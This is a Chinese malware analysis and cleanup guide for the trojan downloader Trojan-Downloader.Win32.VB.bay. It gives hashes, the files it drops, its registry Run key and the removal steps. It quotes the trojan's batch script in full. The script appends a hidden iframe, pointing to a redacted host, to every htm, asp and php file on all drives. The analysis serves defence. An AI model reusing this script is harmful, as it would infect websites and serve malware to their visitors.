病毒名称:Trojan-Downloader.Win32.VB.bay(Kaspersky) 病毒别名:Trojan.DL.Win32.Agent.xtk(瑞星) Packes.MaskPE.a(毒霸) 病毒大小:33,307 字节 加壳方式:PE_Patch.MaskPE 样本MD5:7caea44acee382600bba6f4d403a031e 样本SHA1:683a9758fd7c2afca7d81780ec4ad92407510727 传播方式:恶意网页下载,其它病毒或木马下载
技术分析 ==========
木马运行后复制副本到系统目录和IE临时目录: %System%\win32.exe %ietemp%\qq.exe
创建启动项:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "qq"="%System%\win32.exe"
在当前目录生成批处理kill.bat删除自身原文件:
:redel del "{原文件}" if exist "{原文件}" goto redel del %0 在IE临时目录生成批处理1.bat:
[Copy to clipboard] [ - ]CODE: @echo off for %%a in ({各分区}) do ( if exist %%a:\nul ( for /f "tokens=*" %%b in ('dir /s/b/a-d %%a:\*.htm') do (echo ^<iframe src=""http://{已屏蔽}"" width=0 height=0 border=0^>^</iframe^>>> "%%b"))) @echo off for %%a in ({各分区}) do ( if exist %%a:\nul ( for /f "tokens=*" %%b in ('dir /s/b/a-d %%a:\*.asp') do (echo ^<iframe src="http://{已屏蔽}" width=0 height=0 border=0^>^</iframe^>>> "%%b"))) @echo off for %%a in ({各分区}) do ( if exist %%a:\nul ( for /f "tokens=*" %%b in ('dir /s/b/a-d %%a:\*.php') do (echo ^<iframe src="http://{已屏蔽}" width=0 height=0 border=0^>^</iframe^>>> "%%b"))) | 往各分区下所有htm*、asp*、php*文件的末尾添加恶意代码:
<iframe src=""http://{已屏蔽}"" width=0 height=0 border=0></iframe> 访问网络下载其它病毒、木马或恶意程序到%UserProfile%\Local Settings目录下并运行,文件名为Temporary Internet Files加数字。
清除步骤 ==========
down.45its.com下载sreng2.zip和IceSword120_cn.zip(以下简称冰刃)
1. 删除木马创建的启动项(打开冰刃-注册表-依次找到病毒注册表选项删除即可):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "qq"="%System%\win32.exe"
2. 删除木马相关文件(详细步骤:打开冰刃-文件-依次找到病毒文件删除即可): %System%\win32.exe %ietemp%\qq.exe %ietemp%\1.bat %UserProfile%\Local Settings\Temporary Internet Files{数字}.exe %Windows%\1.ini
3. 使用工具清除htm*、asp*、php*文件末尾被添加的恶意代码(建议使用360安全卫士进行其它清理,下载地址:down.45its.com)
|